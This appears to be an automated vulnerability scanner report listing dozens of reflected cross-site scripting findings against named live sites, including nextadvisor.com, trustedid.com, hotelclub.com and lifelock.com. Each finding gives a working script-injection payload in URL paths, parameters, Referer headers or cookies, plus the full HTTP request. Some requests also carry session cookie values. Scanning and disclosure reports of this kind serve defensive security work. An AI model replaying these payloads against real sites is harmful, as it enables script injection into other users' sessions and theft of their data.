GET /pmid/js/jquery.jsc828a"><script>alert(1)</script>d972e93d2be HTTP/1.1 Host: www.nextadvisor.com Proxy-Connection: keep-alive Referer: http://www.nextadvisor.com/pmid/?kw=id%2520gid9a%2520identity%2520theft%2520resource_ordering34--2011-04-23--20-10-01CD1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e678"><script>alert(1)</script>59725e772e8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pmid4e678"><script>alert(1)</script>59725e772e8/js/jquery.validate.min.js HTTP/1.1 Host: www.nextadvisor.com Proxy-Connection: keep-alive Referer: http://www.nextadvisor.com/pmid/?kw=id%2520gid9a%2520identity%2520theft%2520resource_ordering34--2011-04-23--20-10-01CD1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 612b5"><script>alert(1)</script>5ee41bf8af was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pmid/js612b5"><script>alert(1)</script>5ee41bf8af/jquery.validate.min.js HTTP/1.1 Host: www.nextadvisor.com Proxy-Connection: keep-alive Referer: http://www.nextadvisor.com/pmid/?kw=id%2520gid9a%2520identity%2520theft%2520resource_ordering34--2011-04-23--20-10-01CD1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c856d'><img%20src%3da%20onerror%3dalert(1)>43a6f1cd54f was submitted in the REST URL parameter 2. This input was echoed as c856d'><img src=a onerror=alert(1)>43a6f1cd54f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /pmid/jsc856d'><img%20src%3da%20onerror%3dalert(1)>43a6f1cd54f/jquery.validate.min.js HTTP/1.1 Host: www.nextadvisor.com Proxy-Connection: keep-alive Referer: http://www.nextadvisor.com/pmid/?kw=id%2520gid9a%2520identity%2520theft%2520resource_ordering34--2011-04-23--20-10-01CD1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 999eb"><script>alert(1)</script>e7251367e18 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pmid/js/jquery.validate.min.js999eb"><script>alert(1)</script>e7251367e18 HTTP/1.1 Host: www.nextadvisor.com Proxy-Connection: keep-alive Referer: http://www.nextadvisor.com/pmid/?kw=id%2520gid9a%2520identity%2520theft%2520resource_ordering34--2011-04-23--20-10-01CD1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 382db"><script>alert(1)</script>73094e0c235 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pmid382db"><script>alert(1)</script>73094e0c235/style.css HTTP/1.1 Host: www.nextadvisor.com Proxy-Connection: keep-alive Referer: http://www.nextadvisor.com/pmid/?kw=id%2520gid9a%2520identity%2520theft%2520resource_ordering34--2011-04-23--20-10-01CD1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e22eb'><img%20src%3da%20onerror%3dalert(1)>65ff3245d2 was submitted in the REST URL parameter 1. This input was echoed as e22eb'><img src=a onerror=alert(1)>65ff3245d2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /pmide22eb'><img%20src%3da%20onerror%3dalert(1)>65ff3245d2/style.css HTTP/1.1 Host: www.nextadvisor.com Proxy-Connection: keep-alive Referer: http://www.nextadvisor.com/pmid/?kw=id%2520gid9a%2520identity%2520theft%2520resource_ordering34--2011-04-23--20-10-01CD1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99035"><script>alert(1)</script>aad44ddd58a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pmid/style.css99035"><script>alert(1)</script>aad44ddd58a HTTP/1.1 Host: www.nextadvisor.com Proxy-Connection: keep-alive Referer: http://www.nextadvisor.com/pmid/?kw=id%2520gid9a%2520identity%2520theft%2520resource_ordering34--2011-04-23--20-10-01CD1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812
The value of the promoCodeRefIde request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ee863'><script>alert(1)</script>c9c8e536919 was submitted in the promoCodeRefIde parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /idfide01/?promoCodeRefIde=NXTIDF01IDEFTee863'><script>alert(1)</script>c9c8e536919&promoCodeRefIdf=NXTIDF01IDFFT15 HTTP/1.1 Host: www.trustedid.com Connection: keep-alive Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TIDT=173.193.214.243.1303614754152763; TSI=6rjj85kupb6n5r77pnlgtoq3g0; promoRefCode=NXDIRSUZIDPANN
The value of the promoCodeRefIde request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd735"><script>alert(1)</script>6c8574a0de7 was submitted in the promoCodeRefIde parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /idfide01/?promoCodeRefIde=NXTIDF01IDEFTbd735"><script>alert(1)</script>6c8574a0de7&promoCodeRefIdf=NXTIDF01IDFFT15 HTTP/1.1 Host: www.trustedid.com Connection: keep-alive Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TIDT=173.193.214.243.1303614754152763; TSI=6rjj85kupb6n5r77pnlgtoq3g0; promoRefCode=NXDIRSUZIDPANN
The value of the promoCodeRefIdf request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c5092'><script>alert(1)</script>11d7a4f151a was submitted in the promoCodeRefIdf parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /idfide01/?promoCodeRefIde=NXTIDF01IDEFT&promoCodeRefIdf=NXTIDF01IDFFT15c5092'><script>alert(1)</script>11d7a4f151a HTTP/1.1 Host: www.trustedid.com Connection: keep-alive Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TIDT=173.193.214.243.1303614754152763; TSI=6rjj85kupb6n5r77pnlgtoq3g0; promoRefCode=NXDIRSUZIDPANN
The value of the email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85c56"><script>alert(1)</script>0c0f9b808c2 was submitted in the email parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /suzeidprotector/?first_name=&last_name=&email=85c56"><script>alert(1)</script>0c0f9b808c2 HTTP/1.1 Host: www.trustedid.com Connection: keep-alive Referer: https://www.trustedid.com/suzeidprotector/?promoRefCode=NXDIRSUZIDPANN User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TIDT=173.193.214.243.1303614754152763; TSI=bg6lv8vfkkmtda2h58k3p9hgv3; promoRefCode=NXTIDF01IDEFT
The value of the first_name request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3782"><script>alert(1)</script>f649900f46c was submitted in the first_name parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /suzeidprotector/?first_name=e3782"><script>alert(1)</script>f649900f46c&last_name=&email= HTTP/1.1 Host: www.trustedid.com Connection: keep-alive Referer: https://www.trustedid.com/suzeidprotector/?promoRefCode=NXDIRSUZIDPANN User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TIDT=173.193.214.243.1303614754152763; TSI=bg6lv8vfkkmtda2h58k3p9hgv3; promoRefCode=NXTIDF01IDEFT
The value of the last_name request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87203"><script>alert(1)</script>ef9dea1c101 was submitted in the last_name parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /suzeidprotector/?first_name=&last_name=87203"><script>alert(1)</script>ef9dea1c101&email= HTTP/1.1 Host: www.trustedid.com Connection: keep-alive Referer: https://www.trustedid.com/suzeidprotector/?promoRefCode=NXDIRSUZIDPANN User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TIDT=173.193.214.243.1303614754152763; TSI=bg6lv8vfkkmtda2h58k3p9hgv3; promoRefCode=NXTIDF01IDEFT
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12eb7"><script>alert(1)</script>7915b0ca952 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET / HTTP/1.1 Host: www.hotelclub.com Proxy-Connection: keep-alive Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Referer: http://www.google.com/search?hl=en&q=12eb7"><script>alert(1)</script>7915b0ca952
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 881a1"><script>alert(1)</script>c0ea8f8c816 was submitted in the Referer HTTP header. This input was echoed as 881a1\"><script>alert(1)</script>c0ea8f8c816 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /link.php?kw=gid9a%20identity%20theft%20resource_ordering34&category=identitytheft&link=idtheftshield&id=227 HTTP/1.1 Host: www.nextadvisor.com Proxy-Connection: keep-alive Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812 Referer: http://www.google.com/search?hl=en&q=881a1"><script>alert(1)</script>c0ea8f8c816
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f376"><script>alert(1)</script>f66b92f9263 was submitted in the Referer HTTP header. This input was echoed as 9f376\"><script>alert(1)</script>f66b92f9263 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /pmid?kw=id%20gid9a%20identity%20theft%20resource_ordering34--2011-04-23--20-10-01CD1 HTTP/1.1 Host: www.nextadvisor.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812 Referer: http://www.google.com/search?hl=en&q=9f376"><script>alert(1)</script>f66b92f9263
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61957"><script>alert(1)</script>3ad037bb494 was submitted in the Referer HTTP header. This input was echoed as 61957\"><script>alert(1)</script>3ad037bb494 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /pmid/?kw=id%2520gid9a%2520identity%2520theft%2520resource_ordering34--2011-04-23--20-10-01CD1 HTTP/1.1 Host: www.nextadvisor.com Proxy-Connection: keep-alive Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812 Referer: http://www.google.com/search?hl=en&q=61957"><script>alert(1)</script>3ad037bb494
The value of the BMX_3PC cookie is copied into the HTML document as plain text between tags. The payload 32dd0<script>alert(1)</script>545950acd64 was submitted in the BMX_3PC cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the BMX_G cookie is copied into the HTML document as plain text between tags. The payload 299e3<script>alert(1)</script>04ee78f4696 was submitted in the BMX_G cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the UID cookie is copied into the HTML document as plain text between tags. The payload 14ebe<script>alert(1)</script>6914188f971 was submitted in the UID cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the ar_p91300630 cookie is copied into the HTML document as plain text between tags. The payload 23ca7<script>alert(1)</script>3d772f731c6 was submitted in the ar_p91300630 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the ar_p97174789 cookie is copied into the HTML document as plain text between tags. The payload c4fd8<script>alert(1)</script>77954a0fecc was submitted in the ar_p97174789 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the C3UID cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 372b9'%3balert(1)//28e517d2070 was submitted in the C3UID cookie. This input was echoed as 372b9';alert(1)//28e517d2070 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /c3realview.js HTTP/1.1 Host: breathe.c3metrics.com Proxy-Connection: keep-alive Referer: http://www.lifelock.com/about/lifelock-in-the-community/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: C3UID=13014572191303613803372b9'%3balert(1)//28e517d2070; SERVERID=s11
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 03:16:42 GMT Server: Apache P3P: CP="NON DSP CURa ADMo DEVo PSAo PSDo IVAo IVDo OUR SAMo BUS UNI COM NAV INT" Cache-Control: no-cache Expires: -1 Connection: close Content-Type: text/html Content-Length: 9648
The value of the LifeLockEnrollment cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c606"><script>alert(1)</script>44823d22b35 was submitted in the LifeLockEnrollment cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the LifeLockEnrollment cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19f44"><script>alert(1)</script>cf60dea9c5 was submitted in the LifeLockEnrollment cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the LifeLockEnrollment cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94aa7"><script>alert(1)</script>167524f77ad was submitted in the LifeLockEnrollment cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the LifeLockEnrollment cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3bdd"><script>alert(1)</script>b0ca6746d39 was submitted in the LifeLockEnrollment cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the LifeLockEnrollment cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58800"><script>alert(1)</script>8aee1f6f841 was submitted in the LifeLockEnrollment cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.
